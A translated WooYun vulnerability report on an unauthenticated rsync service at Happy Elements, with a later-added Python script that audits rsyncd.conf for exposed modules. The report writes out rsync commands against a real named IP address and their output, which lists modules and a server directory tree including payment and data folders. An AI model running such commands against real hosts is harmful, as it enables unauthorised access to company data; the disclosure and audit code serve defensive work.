
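Vulnerability summary

Bug ID: wooyun-2015-0112131

Title: Unauthorized access to a Happy Elements (乐元素) rsync service may leak a large amount of sensitive information

Vendor: happyelements.cn

Author: 路人甲

Submitted: 2015-05-05 11:18

Fixed: 2015-06-19 11:38

Published: 2015-06-19 11:38

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]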



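Vulnerability details

Disclosure status:

2015-05-05: Details reported to the vendor; awaiting vendor handling
2015-05-05: Vendor confirmed; details disclosed to the vendor only
2015-05-15: Details disclosed to core white hats and experts in related fields
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to intern white hats
2015-06-19: Details disclosed to the public

Brief description:

Unauthorized access to a Happy Elements rsync service may leak a large amount of sensitive information

Detailed description: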

root@jack:~# rsync 218.106.255.53::
rtest
titan
apollo
rome
gip
fishbowl
forest
malldream
fbcard
payment
adventure
fortuna
athena
gaia
dreamcake
rdcenter
eskimo
piratessaga
poseidon
bubble
iceberg
qqfuzhuangdian
warcrisis
--help
odin
picasso
pirate
noah
league
kingdomplay
hotbottlesh
pandora
adam
magicpet
fireempire
test_optimize
test
fighter
kongfusaga
animal
eris
yanhuang
xiyou
hongjing
wukong
yanyi
jianghu
kuaida
canon
hunluanwulin
towerdefence
mobile_bubble
mbubble
manimal
mistresses


root@jack:~# rsync 218.106.255.53::gip
drwxr-xr-x 4096 2013/07/26 12:36:56 .
-rw-r--r-- 0 2012/10/31 00:35:32 .autofsck
-rw-r--r-- 0 2011/03/11 21:30:50 .autorelabel
srwxr-xr-x 0 2012/06/11 08:33:43 .dbfseventsd
-rw-r--r-- 630 2013/05/31 02:52:58 crossdomain.xml
-rwxr-xr-x 15567576 2012/04/09 22:34:04 mach_kernel
-rwxr-xr-x 235320 2011/12/31 03:42:00 n6au6v.jpg
-rw-r--r-- 8 2011/09/08 03:52:05 ok.html
-rwxr-xr-x 2718 2011/05/11 23:30:22 pause.xml
-rw-r--r-- 19 2011/02/16 12:34:11 sn.txt
lrwxrwxrwx 75 2012/06/12 05:20:18 用户手册和信息
drwxr-xr-x 4096 2012/05/14 19:58:37 .DocumentRevisions-V100
drwxr-xr-x 4096 2011/07/08 05:04:27 .Spotlight-V100
drwxr-xr-x 4096 2011/07/08 05:13:16 .Trashes
drwxr-xr-x 4096 2012/06/12 03:25:22 .fseventsd
drwxr-xr-x 4096 2011/06/25 02:05:31 .vol
drwxr-xr-x 4096 2012/10/08 08:18:15 404
drwxr-xr-x 4096 2012/06/12 07:39:58 Applications
drwxr-xr-x 4096 2012/12/18 22:44:01 app
drwxr-xr-x 4096 2012/08/16 20:04:42 build
drwxr-xr-x 4096 2012/10/08 22:44:49 client
drwxr-xr-x 4096 2012/11/22 22:22:30 clinic
drwxr-xr-x 4096 2012/05/20 22:30:15 common
drwxr-xr-x 4096 2013/05/31 02:52:58 component
drwxr-xr-x 4096 2012/10/08 22:44:49 container
drwxr-xr-x 4096 2011/04/02 11:54:15 css
drwxr-xr-x 4096 2013/10/31 07:35:23 data
drwxrwxr-x 4096 2013/07/26 15:34:41 facebook_channel
drwxr-xr-x 12288 2012/10/17 03:45:57 fm
drwxr-xr-x 4096 2011/08/04 04:02:02 framework
drwxr-xr-x 4096 2011/04/02 11:53:54 gadgetXML
drwxr-xr-x 4096 2014/05/06 22:33:58 gip_image_upload
drwxr-xr-x 4096 2011/09/25 23:54:39 html
drwxr-xr-x 4096 2011/11/18 00:21:00 html5
drwxr-xr-x 4096 2013/01/03 23:16:55 images
drwxr-xr-x 4096 2011/04/02 11:53:54 integration
drwxr-xr-x 4096 2011/04/02 11:53:54 js
drwxr-xr-x 4096 2011/12/15 02:54:40 mall
drwxr-xr-x 4096 2012/04/11 04:43:25 monitor
drwxr-xr-x 4096 2012/05/15 05:03:10 ops_test_dir
drwxr-xr-x 4096 2014/01/17 06:06:03 partition
drwxr-xr-x 4096 2011/04/02 11:46:58 partner
drwxr-xr-x 4096 2011/07/19 02:48:35 payment
drwxr-xr-x 4096 2013/05/31 02:52:58 platform
drwxr-xr-x 4096 2011/12/21 22:58:05 portal
drwxr-xr-x 4096 2011/04/02 11:54:42 portal_images
drwxr-xr-x 4096 2011/04/02 11:54:02 preloader
drwxr-xr-x 12288 2011/04/02 11:54:33 promotion
drwxr-xr-x 4096 2013/07/26 12:36:56 qzone_static
drwxr-xr-x 4096 2013/07/25 15:22:39 static
drwxr-xr-x 4096 2012/01/13 02:52:28 swf
drwxr-xr-x 4096 2011/04/07 01:30:48 tencent
drwxr-xr-x 4096 2011/06/14 02:59:21 test
drwxr-xr-x 4096 2011/06/07 03:09:46 translation
drwxr-xr-x 4096 2011/04/02 11:54:43 util
drwxrwxrwx 4096 2013/01/09 04:09:47 xfiles
drwxr-xr-x 4096 2012/05/10 23:20:20 xfiles_prod
drwxr-xr-x 4096 2012/11/13 01:28:06 zoom

Proof of vulnerability:

[Screenshot: 乐乐.png]

Fix:

...

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)
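
The two commands in the report succeed because the daemon lists its modules and serves them without authentication or host restrictions. As an added example (not part of the original report, and not the vendor's configuration), this Python script audits an rsyncd.conf for those conditions; the sample configuration, module names, paths and addresses are constructed.

```python
import re
# Constructed sample rsyncd.conf; module names, paths and hosts are hypothetical.
SAMPLE_CONF = """\
# global section: defaults inherited by every module
list = no
[webroot]
path = /srv/webroot
list = yes
[uploads]
path = /srv/uploads
read only = no
hosts allow = 10.0.0.0/8
[backup]
path = /srv/backup
auth users = backupuser
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.5
"""

def parse(text):
    """Return (global_params, {module: params}); &include and continuations not handled."""
    glob, modules, cur = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith("#"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            cur = modules.setdefault(m.group(1).strip(), {})
        elif "=" in line:
            k, v = line.split("=", 1)
            key = re.sub(r"\s+", "", k).lower()  # names ignore case and whitespace
            (glob if cur is None else cur)[key] = v.strip()
    return glob, modules

def findings(eff):
    """Exposure findings for one module's effective parameters (empty list = none)."""
    yes = lambda k, d: eff.get(k, d).lower() in ("yes", "true", "1")
    anon = not eff.get("authusers")
    checks = [
        (anon, "anonymous access (no 'auth users')"),
        (anon and not yes("readonly", "yes"), "writable without authentication"),
        (not eff.get("hostsallow"), "no 'hosts allow' restriction"),
        (yes("list", "yes"), "module is listed to any client"),
    ]
    return [msg for hit, msg in checks if hit]

def audit(text):
    """Map each module name to its findings; module values override global defaults."""
    glob, modules = parse(text)
    return {name: findings({**glob, **p}) for name, p in modules.items()}
```

Calling `audit(open("/etc/rsyncd.conf").read())` on a daemon host returns a dict of module names to findings; the path is the usual default and may differ on a given system.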


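Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-05-05 11:37

Vendor reply:

Not a very important server, but many thanks to the finder all the same

Latest status:

None yet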